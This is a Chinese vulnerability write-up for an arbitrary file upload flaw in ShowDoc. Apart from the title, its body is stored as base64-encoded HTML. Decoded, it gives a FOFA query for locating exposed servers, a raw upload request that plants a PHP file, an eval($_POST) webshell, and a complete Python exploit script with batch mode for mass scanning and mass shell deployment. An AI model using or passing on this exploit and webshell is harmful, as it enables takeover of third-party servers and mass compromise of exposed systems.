ShowDoc 任意文件上传漏洞

PGgyPjxhIG5hbWU9Iua8j+a0nuaPj+i/sCI+PC9hPjxzcGFuPjwvc3Bhbj7mvI/mtJ7mj4/ov7A8L2gyPjxwPlNob3dEb2PmmK/kuIDkuKrpnZ7luLjpgILlkIhJVOWboumYn+eahOWcqOe6v+aWh+aho+WIhuS6q+W3peWFt++8jOWug+WPr+S7peWKoOW/q+WboumYn+S5i+mXtOayn+mAmueahOaViOeOh+OAgumAmui/h3Nob3dkb2PvvIzkvaDlj6/ku6Xmlrnkvr/lnLDkvb/nlKhtYXJrZG93buivreazleadpeS5puWGmeWHuue+juingueahEFQSeaWh+aho+OAgeaVsOaNruWtl+WFuOaWh+aho+OAgeaKgOacr+aWh+aho+OAgeWcqOe6v2V4Y2Vs5paH5qGj562J562J44CCU2hvd0RvY+ezu+e7n+WtmOWcqOS7u+aEj+aWh+S7tuS4iuS8oOa8j+a0nu+8jOaUu+WHu+iAheWPr+S7pemAmui/h+S4iuS8oOaBtuaEj+aWh+S7tuaJp+ihjOS7u+aEj+WRveS7pO+8jOiOt+WPluacjeWKoeWZqOeuoeeQhuadg+mZkOOAgjxicj48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvODg4MC9jMzg4ZjA4MDllMDliNjk4NzhiYWNlYzFmMjQ1NTRmYV8xNDk2NC5wbmciIGFsdD0iIj48L3A+CjxoMj48YSBuYW1lPSLmvI/mtJ7lpI3njrAiPjwvYT48c3Bhbj48L3NwYW4+5ryP5rSe5aSN546wPC9oMj48cD5mb2ZhOjxicj48Y29kZT5hcHA9JnF1b3Q7U2hvd0RvYyZxdW90OzwvY29kZT48YnI+MS7kvb/nlKhQT0PkuIrkvKBwaHBpbmZv5paH5Lu277yM5Zue5pi+5LiK5Lyg6Lev5b6E5Y2z5LiK5Lyg5oiQ5YqfPC9wPgo8cHJlPjxjb2RlPlBPU1QgL2luZGV4LnBocD9zPS9ob21lL3BhZ2UvdXBsb2FkSW1nIEhUVFAvMS4xCkhvc3Q6IHlvdXItaXA6cG9ydApVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCAxMC4wOyBXaW42NDsgeDY0OyBydjo4MS4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzgxLjAKQ29udGVudC1MZW5ndGg6IDI0MwpDb250ZW50LVR5cGU6IG11bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tOTIxMzc4MTI2MzcxNjIzNzYyMTczNjE3CkFjY2VwdC1FbmNvZGluZzogZ3ppcAoKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTkyMTM3ODEyNjM3MTYyMzc2MjE3MzYxNwpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9JnF1b3Q7ZWRpdG9ybWQtaW1hZ2UtZmlsZSZxdW90OzsgZmlsZW5hbWU9JnF1b3Q7dGVzdC5waHAmcXVvdDsKQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluCgombHQ7P3BocCBwaHBpbmZvKCk7PyZndDsKLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTkyMTM3ODEyNjM3MTYyMzc2MjE3MzYxNy0tCjwvY29kZT48L3ByZT4KPHA+PGltZyBzcmM9Imh0dHBzOi8vbmMwLmNkbi56a2FxLmNuL21kLzg4ODAvYWM5NGI5NWNkZTk2NjE1NzBhNjdjYzYzMmY1N2Y0MmFfMzA0MDkucG5nIiBhbHQ9IiI+PGJyPjIu6K6/6Zeu6K+l6Lev5b6E77yM5b6X5Yiw5Zue5pi+PGJyPjxjb2RlPmh0dHA6XC9cL3h4eC54eHgueHh4Lnh4eDo1MDAwXC9QdWJsaWNcL1VwbG9hZHNcLzIwMjItMTAtMjRcLzYzNTY0Y2E0MDYwNTgucGhwPC9jb2RlPjxicj48aW1nIHNyYz0iaHR0cHM6Ly9uYzAuY2RuLnprYXEuY24vbWQvODg4MC9hMmEyMWVlODZjMDQ0NGQ2NjMyY2M1YmRhYjQ5YmYzZl83ODI1My5wbmciIGFsdD0iIj48YnI+My7lsJ3or5XkvKDpqaxnZXRzaGVsbDwvcD4KPHByZT48Y29kZT56aGFuZzMmbHQ7P3BocApldmFsCigkX1BPU1QKW2FdKQo/Jmd0Owo8L2NvZGU+PC9wcmU+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC84ODgwLzYyYjMzNDUxMjg3NDhiZmM5ZmQwMDgyZjljODIwMjI0XzM3NzMyLnBuZyIgYWx0PSIiPjwvcD4KPHA+PGltZyBzcmM9Imh0dHBzOi8vbmMwLmNkbi56a2FxLmNuL21kLzg4ODAvYzMwYjcwNjY4MGU1MjE3MGM2ZTQ4NTZkNmJkY2I3N2FfNjgyMTEucG5nIiBhbHQ9IiI+PC9wPgo8aDI+PGEgbmFtZT0icG9j77yaIj48L2E+PHNwYW4+PC9zcGFuPnBvY++8mjwvaDI+PHByZT48Y29kZT4jIS91c3IvbG9jYWwvYmluL3B5dGhvbjMKIyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KIyAmbHQ7c3BhbiZndDtAVGltZSZsdDsvc3BhbiZndDsgICAgOiAyMDIyLzEwLzI0IDE5OjUyCiMgJmx0O3NwYW4mZ3Q7QEF1dGhvciZsdDsvc3BhbiZndDsgIDogcG9wb2QxbmcKCgppbXBvcnQgcmVxdWVzdHMKaW1wb3J0IHRpbWUKaW1wb3J0IHJlCmltcG9ydCBhcmdwYXJzZQppbXBvcnQgdXJsbGliMwppbXBvcnQgYmFzZTY0CgpwYXJzZXIgPSBhcmdwYXJzZS5Bcmd1bWVudFBhcnNlcihkZXNjcmlwdGlvbj0mIzM5O+W4ruWKqeS/oeaBryEmIzM5OykKcGFyc2VyLmFkZF9hcmd1bWVudCgmIzM5Oy11JiMzOTssICYjMzk7LS11cmwmIzM5OywgaGVscD0mIzM5O+WNleS4quajgOa1iyYjMzk7LCBkZWZhdWx0PSYjMzk7JiMzOTspCnBhcnNlci5hZGRfYXJndW1lbnQoJiMzOTstZiYjMzk7LCAmIzM5Oy0tZmlsZSYjMzk7LCBoZWxwPSYjMzk75aSa5Liq5qOA5rWLJiMzOTssIGRlZmF1bHQ9JiMzOTsmIzM5OykKdXJsbGliMy5kaXNhYmxlX3dhcm5pbmdzKCkKYXJncyA9IHBhcnNlci5wYXJzZV9hcmdzKCkKbmFtZSA9ICYjMzk7JiMzOTsmIzM5OwogICBfX19fXyBfICAgICAgICAgICAgICAgICAgIF9fX19fICAgICAgICAgICAgIAogIC8gX19fX3wgfCAgICAgICAgICAgICAgICAgfCAgX18gXCAgICAgICAgICAgIAogfCAoX19fIHwgfF9fICAgX19fX18gICAgICBffCB8ICB8IHwgX19fICAgX19fIAogIFxfX18gXHwgJiMzOTtfIFwgLyBfIFwgXCAvXCAvIC8gfCAgfCB8LyBfIFwgLyBfX3wKICBfX19fKSB8IHwgfCB8IChfKSBcIFYgIFYgL3wgfF9ffCB8IChfKSB8IChfXyAKIHxfX19fXy98X3wgfF98XF9fXy8gXF8vXF8vIHxfX19fXy8gXF9fXy8gXF9fX3wgICAgICAKCkZPRkHor63ms5XvvJphcHA9JnF1b3Q7U2hvd0RvYyZxdW90OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKCiYjMzk7JiMzOTsmIzM5OwpwcmludChuYW1lKQoKCmRlZiBwb2ModXJsKToKICAgIHRhcmdldCA9IHVybCArICZxdW90Oy9pbmRleC5waHA/cz0vaG9tZS9wYWdlL3VwbG9hZEltZyZxdW90OwogICAgaGVhZGVycyA9IHsKICAgICAgICAmIzM5O0NvbnRlbnQtVHlwZSYjMzk7OiAmIzM5O211bHRpcGFydC9mb3JtLWRhdGE7IGJvdW5kYXJ5PS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tOTIxMzc4MTI2MzcxNjIzNzYyMTczNjE3JiMzOTssCiAgICAgICAgJiMzOTtDb250ZW50LUxlbmd0aCYjMzk7OiAmIzM5OzI2MCYjMzk7LAogICAgICAgICYjMzk7VXNlci1BZ2VudCYjMzk7OiAmIzM5O01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQ7IHJ2OjgxLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvODEuMCYjMzk7LAogICAgICAgICYjMzk7QWNjZXB0JiMzOTs6ICYjMzk7dGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksaW1hZ2UvYXZpZixpbWFnZS93ZWJwLGltYWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC45JiMzOTssCiAgICAgICAgJiMzOTtBY2NlcHQtRW5jb2RpbmcmIzM5OzogJiMzOTtnemlwJiMzOTssCiAgICB9CiAgICBwYXlsb2FkID0gJiMzOTsmIzM5OyYjMzk7CkxTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExTMHRMUzB0TFMwdExUa3lNVE0zT0RFeU5qTTNNVFl5TXpjMk1qRTNNell4TndwRGIyNTBaVzUwTFVScGMKM0J2YzJsMGFXOXVPaUJtYjNKdExXUmhkR0U3SUc1aGJXVTlJbVZrYVhSdmNtMWtMV2x0WVdkbExXWnBiR1VpT3lCbWFXeGxibUZ0WlQwaWRHVnpkQwo0OFBuQm9jQ0lLUTI5dWRHVnVkQzFVZVhCbE9pQjBaWGgwTDNCc1lXbHVDZ284UDNCb2NDQndhSEJwYm1adktDazdQejRLTFMwdExTMHRMUzB0TFMwCnRMUzB0TFMwdExTMHRMUzB0TFMwdExUa3lNVE0zT0RFeU5qTTNNVFl5TXpjMk1qRTNNell4TnkwdAogICAgICAmIzM5OyYjMzk7JiMzOTsKICAgIHByaW50KCZxdW90Oy0mcXVvdDsgKiA2MCkKICAgIHRyeToKICAgICAgICByID0gcmVxdWVzdHMucG9zdCh1cmw9dGFyZ2V0LCBoZWFkZXJzPWhlYWRlcnMsIGRhdGE9YmFzZTY0LmRlY29kZWJ5dGVzKHBheWxvYWQuZW5jb2RlKCYjMzk7dXRmLTgmIzM5OykpLmRlY29kZSgpLAogICAgICAgICAgICAgICAgICAgICAgICAgIHRpbWVvdXQ9OCwgdmVyaWZ5PUZhbHNlKQogICAgICAgIG1hdGNoID0gcmUuc2VhcmNoKHImIzM5OyZxdW90O3VybCZxdW90OzomcXVvdDsoLio/KSZxdW90OywmIzM5Oywgci50ZXh0LCByZS5JIHwgcmUuTSkKICAgICAgICBzID0gbWF0Y2hbMV0KICAgICAgICBzID0gcy5yZXBsYWNlKCYjMzk7XFwmIzM5OywgJiMzOTsmIzM5OykKICAgICAgICBwcmludCgmcXVvdDvmraPlnKjmo4DmtYvvvJomcXVvdDsgKyB1cmwpCiAgICAgICAgcHJpbnQoJnF1b3Q75LiK5Lyg5oiQ5Yqf6K+36K6/6Zeu77yaJnF1b3Q7ICsgcykKICAgIGV4Y2VwdDoKICAgICAgICBwcmludCgmcXVvdDvovpPlhaXmnInor6/vvIEmcXVvdDspCiAgICBwcmludCgmcXVvdDstJnF1b3Q7ICogNjApCgoKZGVmIG1vcmUoZmlsZSk6CiAgICBmID0gb3BlbihmaWxlLCAmIzM5O3ImIzM5OykKICAgIGZvciBpIGluIGYucmVhZGxpbmVzKCk6CiAgICAgICAgaSA9IGkuc3RyaXAoKQogICAgICAgIHBvYyhpKQogICAgICAgIHByaW50KCZxdW90O+mqjOivgeWujOavlSZxdW90OykKCgppZiBfX25hbWVfXyA9PSAmIzM5O19fbWFpbl9fJiMzOTs6CiAgICBpZiBhcmdzLnVybCAhPSAmcXVvdDsmcXVvdDsgYW5kIGFyZ3MuZmlsZSA9PSAmcXVvdDsmcXVvdDs6CiAgICAgICAgcG9jKGFyZ3MudXJsKQogICAgaWYgYXJncy51cmwgPT0gJnF1b3Q7JnF1b3Q7IGFuZCBhcmdzLmZpbGUgIT0gJnF1b3Q7JnF1b3Q7OgogICAgICAgIG1vcmUoYXJncy5maWxlKQo8L2NvZGU+PC9wcmU+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC84ODgwLzY1OTc0MjkxMTE2NDliMDgxNTUzNjk2NDU0MDA5YzJjXzE1NDc3LnBuZyIgYWx0PSIiPjxicj7pqozor4HmiJDlip/vvJo8L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC84ODgwL2E2MzczZjJjYTljMjI2MzY4YzE4NDYyMzY2ZDEzMGFkXzc5NDUzLnBuZyIgYWx0PSIiPjxicj5mb2ZhX2d1aeW3peWFt++8mjxicj48Y29kZT5odHRwczovL2dpdGh1Yi5jb20vU3VtbWVyMTc3L0ZPRkFfR1VJPC9jb2RlPjwvcD4KPHA+PGltZyBzcmM9Imh0dHBzOi8vbmMwLmNkbi56a2FxLmNuL21kLzg4ODAvMzM4NjE0MzcwODdlYTk3NDE0ZDM4OGU1M2ZhYWViMGVfNzg2OTEucG5nIiBhbHQ9IiI+PGJyPuWwhuebruagh+aLt+WHuuadpe+8jOaUvuWcqC50eHTmlofku7bkuK3vvJo8L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC84ODgwL2Y0MmNhOTc2YWFkYzU0NTM3NDIxYzI3NThhNDRlYWRkXzQwMDQzLnBuZyIgYWx0PSIiPjxicj7mibnph4/ljJbmiavmvI/mtJ7vvJo8L3A+CjxwPjxpbWcgc3JjPSJodHRwczovL25jMC5jZG4uemthcS5jbi9tZC84ODgwLzE4YmIxMGM5NTVhNzQ0YzBkOGJiNDYwZjYxNjQ4MzE2XzY2NjQ3LnBuZyIgYWx0PSIiPjxicj7mibnph4/ljJZnZXRzaGVsbOWPqumcgOimgeaKinBheWxvYWTpg6jliIbljJbmiJBwaHDkuIDlj6Xor53mnKjpqazljbPlj6/vvIznlKhidXJw6Kej5a+G5Yqg5a+G44CCPC9wPgo8aDI+PGEgbmFtZT0i5Y+C6ICD6ZO+5o6lIj48L2E+PHNwYW4+PC9zcGFuPuWPguiAg+mTvuaOpTwvaDI+PHA+PGNvZGU+aHR0cHM6Ly9tcC53ZWl4aW4ucXEuY29tL3MvOW0zWVNFRG8tNkpRUkpUYmdMMjVoZzwvY29kZT48L3A+